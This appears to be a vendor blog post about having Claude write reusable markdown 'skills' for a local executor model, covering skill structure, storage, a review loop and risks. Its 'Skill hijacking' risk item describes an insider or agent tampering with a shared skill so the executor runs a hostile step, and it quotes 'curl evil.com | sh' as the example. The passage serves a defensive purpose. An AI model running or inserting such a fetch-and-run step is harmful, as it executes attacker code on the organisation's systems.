- 24
- May
In EP1 — Planner-Executor Pattern we covered Claude thinking + Local AI doing. The follow-up question came up immediately: if Local AI has to handle work it has never done before, how do we "teach" it without fine-tuning the model (which burns GPU and takes days)? The answer is Skills — playbooks that Claude writes as SOPs for Local AI to load when it encounters a matching trigger. This article explains how skills for Local AI differ from skills Claude reads itself, three ways to store skills in an enterprise, the skill review loop that prevents skill drift, and how to roll this out across a real team.
Quick summary — skills in the Planner-Executor context
✓ It is: a markdown playbook + tool list + trigger condition that Local AI loads when it sees matching work — Claude writes and maintains them.
✗ It isn't: not fine-tuning, not vector-DB embeddings, not a fixed system prompt — a skill loads only when a trigger matches.
Why Skills — The Gap EP1 Doesn't Close
EP1 ends with Claude writing a plan that Local AI executes — which sounds good until Local AI has to do something it has never done before, like "deploy this Angular app to nginx and reload the service." Every time work like that comes in, Claude has to write the plan from scratch, even though it's repetitive work that's 95% identical each time.
That's why skills emerge. The first time: Claude thinks, Local AI does, then Claude summarises into a skill. From the second time on: Claude just says "use the skill called deploy-angular-nginx," Local AI loads it and follows along — Claude's token use drops another 5–10× compared to EP1.
The corporate analogy
Think of a team lead writing an SOP for new hires. The first time they have to walk through every step. After that, they just say "follow SOP-DEPLOY-007" — the new hire opens the doc, follows it, and the lead doesn't have to repeat themselves. Skills work the same way.
What a Skill Actually Is — The Real Structure
A skill used in the Planner-Executor pattern has four parts, written as a single markdown file:
| Part | Purpose | Example |
|---|---|---|
| 1. Frontmatter | Metadata: name, description, trigger keywords | name: deploy-angular-nginx |
| 2. Trigger | Conditions under which Local AI loads this skill | "deploy angular", "ng build + reload nginx" |
| 3. Steps | Explicit sequence of steps (no implicit ones) | step 1: cd /app, step 2: npm run build, ... |
| 4. Tools | Tools this skill is allowed to use | bash, write_file, http_post |
A typical skill is 200–800 lines of markdown — longer than an ad-hoc plan in EP1, but reusable thousands of times. The economics work out fast.
Claude's Own Skills vs Skills Claude Writes for Local AI
This is where many teams trip up on first contact — they take a skill Claude reads for itself and hand it to Local AI. It doesn't work, because Claude infers implicit context far better than Local AI does.
| Dimension | Skill for Claude | Skill for Local AI (e.g. Qwen 32B) |
|---|---|---|
| Explicitness | Moderate — Claude infers missing context | Maximum — name the working directory, env vars, commands directly |
| Typical size | 100–300 lines | 300–800 lines (3–5× longer) |
| Error handling | General patterns are enough | List each error case + the matching fix |
| Decision point | "If this is a production deploy, use flag X" | "If env STAGE=prod run step 4a; if STAGE=staging run step 4b" |
| Output format | "return summary" | "return JSON {status, files_changed, log_tail_20_lines}" |
The upshot: a Local-AI skill is essentially a script written as markdown — strip out as much ambiguity as possible. That's why Claude has to write the skills, not Local AI — Local AI doesn't know what it can't infer; it's the person who doesn't know what they don't know.
Three Ways to Store Skills
As skills accumulate (you might be at 100–500 within six months), storage matters as much as authoring. Get it wrong and you end up with scattered files nobody can find.
| Approach | How it works | Suitable for | Limits |
|---|---|---|---|
| A. Shared folder | Store in .skills/ inside the repo — Claude and Local AI both read files directly |
Small dev teams of 1–5, fewer than 50 skills | Hard to search at scale, no dedicated version control |
| B. MCP Server | Host skills as tools via Model Context Protocol — both models call through the API | Teams already using MCP that want a unified interface | You now have one more service to maintain |
| C. Skill Registry (DB-backed) | A database with skills + version + metrics (success rate, last used) | Organisations using skills daily, that want A/B testing and audit | Most complex setup, needs a dedicated team |
Always start with A. Teams that jump straight to C burn 2–3 months building infrastructure they'll outgrow because they don't yet know what skills they really need — the same reason you build ERP process-first, schema-second (see also ERP Implementation — How to Begin When Your Org Wants ERP).
Skill Review Loop — Preventing Skill Drift
The problem teams hit after 1–2 months on this pattern is skill drift — new skills Claude generates look fine, but when Local AI follows them the result is wrong, because the skill was never tested against the actual executor.
The fix is a four-stage skill review loop:
| Stage | Who | Work | Pass criteria |
|---|---|---|---|
| 1. Generate | Claude | Drafts a skill from a task that has repeated several times | Lint passes (frontmatter complete, every step has an action verb) |
| 2. Dry-run | Local AI | Runs the skill against pre-built test fixtures | ≥ 90% success rate over 10 runs |
| 3. Verify | Claude | Reads logs from all 10 runs and checks results against spec | No false positives |
| 4. Promote | Human (DevOps) | Approves it into the production registry | Human gate before any real use |
Stage 4 is the most important. Never let a skill into production without a human approval, no matter how well the dry-run looks — fixtures never cover every real-world case. Same principle as the audit trail discussion in AI Internal Audit — Auditing AI in Enterprise Work.
⚠️ Risks Specific to a Skill System
1. Skill sprawl
When Claude can write skills easily, teams write a lot of them — and a month in you have 200 skills with 3–4 overlapping ones per task. Local AI doesn't know which to pick. Fix: quota new-skill creation + monthly audit that merges duplicates.
2. Skill hijacking
If the registry is open to editing, an insider (or even an AI agent) could modify a widely-used skill to run something dangerous — slipping curl evil.com | sh into a step nobody scans carefully. Fix: skills go through code review like real code, with diff approval workflow.
3. Stale skills
A skill written six months ago may refer to paths or libraries that have since moved. Local AI follows it and it fails. Fix: track last_success_at per skill — if it hasn't been used in a while and then fails, flag it for Claude to regenerate.
4. Over-fitting to one executor
A skill tested against Qwen 32B may not work on Llama 70B because instruction-following differs per model. Fix: if you plan multi-executor, test every skill against every executor before promotion.
| Risk | Mitigation | Owner |
|---|---|---|
| Skill sprawl | Creation quota + monthly dedupe audit | Tech Lead |
| Skill hijacking | Code review + diff approval, sign skills with a key | DevOps + Security |
| Stale skills | Track last_success_at, auto-flag on failure | Orchestrator |
| Over-fitting executor | Test against every executor before promotion | QA / Tech Lead |
Real Use Cases — Three Skills Most Teams Start With
If you're building a skill registry for the first time, start with these three — the scope is clear, verification is easy, and ROI shows up fast.
A. Skill: generate-migration
Trigger: when there's a schema diff between dev and staging — Local AI generates the migration script (Alembic / Flyway / hand-written SQL) per the skill's steps. Output is a .sql file plus a rollback script.
B. Skill: write-test-from-bug-report
Trigger: when a Linear/Jira bug report includes reproduce steps — Local AI generates a failing test case (red test) from the steps and drops it into the test suite, ready to turn green once the dev fixes the bug.
C. Skill: changelog-from-commits
Trigger: before a release — Local AI reads git log since the last tag, groups by conventional commit type (feat/fix/chore), and writes CHANGELOG.md in the standard format.
All three have immediately verifiable output (run the test, dry-run the migration in a sandbox, read the CHANGELOG), making them ideal for validating that Claude-written skills actually work for your Local AI.
How Saeree ERP Looks at Skills
Developing Saeree ERP means maintaining a lot of modules (accounting, inventory, HR, GFMIS adapter, report engine, etc.) and we hit recurring maintenance work several times a month — "add a new validation rule to form X", "generate a report definition from template Y" — which are strong skill candidates because the pattern is identical every time, only the parameters change.
In the next phase of the AI Assistant Saeree ERP is building, a skill registry is likely to be the key component that lets our on-premise customers "teach" the AI to handle their org-specific customisations — without those skills ever leaving the machine. Same goal as the Planner-Executor pattern in EP1.
Summary — What Skills Add to Planner-Executor
| Compared on | EP1 (Planner-Executor as-is) | EP2 (adding Skills) |
|---|---|---|
| Repetitive work | Claude writes a fresh plan every time | Claude calls an existing skill — tokens drop 5–10× |
| New work | Claude thinks, Local AI does | Same, plus if it'll repeat → Claude promotes it to a skill |
| Executor quality | Depends on each plan | More stable — skills are reviewed |
| Overhead | None — runs immediately | Maintain a skill registry and a review loop |
| Right when | Work isn't stable yet, no clear pattern | The same pattern has shown up ≥ 5 times |
"Skills are how you let the smart AI write SOPs for the cheap AI — so the cheap AI does the work of the smart AI, on tasks where the pattern is already stable."
A Question to Sit With
Of the work your dev/IT team repeats every week — how many patterns are really "SOPs that were never written down"? If AI helped turn those into runnable skills, how many hours per week would you give back to the team? Count five skill candidates closest at hand — that's the seed of a skill registry in your org.
If you're evaluating an AI architecture that bundles planner + executor + skill registry for use with core internal systems, book a consultation with the Saeree ERP team for help fitting it to your data policy and workflow.
References
- Anthropic — Claude Code Skills documentation
- Anthropic — Agent Skills announcement
- Anthropic — Building Effective Agents — orchestrator-workers pattern
- Model Context Protocol — MCP specification (skill-as-tool transport)
- Ollama — Qwen2.5-Coder (executor reference model)
